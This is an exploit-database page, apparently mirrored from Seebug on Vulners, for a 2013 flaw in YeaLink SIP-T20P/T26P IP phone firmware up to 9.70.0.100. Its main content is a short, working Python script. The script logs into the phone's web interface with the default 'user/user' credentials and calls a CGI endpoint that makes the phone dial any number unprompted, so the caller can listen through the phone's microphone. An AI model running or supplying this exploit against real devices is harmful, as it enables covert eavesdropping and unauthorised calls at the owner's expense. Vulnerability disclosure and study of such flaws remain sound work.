Lucene search
K

YeaLink IP Phone Firmware <= 9.70.0.100 - Unauthenticated Phone Call Vulnerability

🗓️ 01 Jul 2014 00:00:00Reported by RootType 
seebug
 seebug
🔗 www.seebug.org👁 161 Views

YeaLink IP Phone Firmware <= 9.70.0.100 Unauthenticated Call Vulnerability 201

Code

                                                # Exploit Title: [YeaLink IP Phone SIP-TxxP firmware &#60;=9.70.0.100 phone
call vulnerability]
# Date: [05-28-2013]
# Exploit Author: [b0hr (francisco&#60;[at]&#62;garnelo.eu)]
# Vendor Homepage: [http://yealink.com]
# Software Link: [
http://yealink.com/product_list.aspx?BaseInfoCateId=147&CateId=147&ProductsCateID=147
]
# Version: 9.70.0.100 and lower]
# Tested on: [YeaLink IP Phone SIP-T20P and SIP-T26P (hardware VoIP
phone)]
# Vulnerability : [It&#39;s possible to make calls from using the first
available sip account, without supervision or confirmation of the user,
also the call receiver can listen through the phone mic .]

#!/usr/bin/python
 
import urllib2, sys
 
print &#34;\n YeaLink IP Phone SIP-TxxP firmware &#60;=9.70.0.100 phone call vulnerability - b0rh (francisco&#60;[at]&#62;garnelo.eu) - 2013-05-28 \n&#34;

if (len(sys.argv) != 3):
    print &#34;&#62;&#62; Use: &#34; + sys.argv[0] + &#34; &#60;IP Phone&#62; &#60;phone number&#62;&#34;
    print &#34;&#62;&#62; Ex: &#34; + sys.argv[0] + &#34; 127.0.0.1 123456789\n&#34;
    exit(0)
 
IP = sys.argv[1]
num = sys.argv[2]
UrlGet_params = &#39;http://%s/cgi-bin/ConfigManApp.com?Id=34&Command=1&Number=%s&Account=0&sid=0.724202975169738&#39; % (IP, num)
webU = &#39;user&#39;
webP = &#39;user&#39;

query = urllib2.HTTPPasswordMgrWithDefaultRealm()
query.add_password(None, UrlGet_params, webU, webP)
auth = urllib2.HTTPBasicAuthHandler(query)
log = urllib2.build_opener(auth)


urllib2.install_opener(log)

queryPag = urllib2.urlopen(UrlGet_params)

print &#34;\n Call to %s form IP phone %s\n&#34; %(num,IP)

                              

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

01 Jul 2014 00:00Current
7.1High risk
Vulners AI Score7.1
161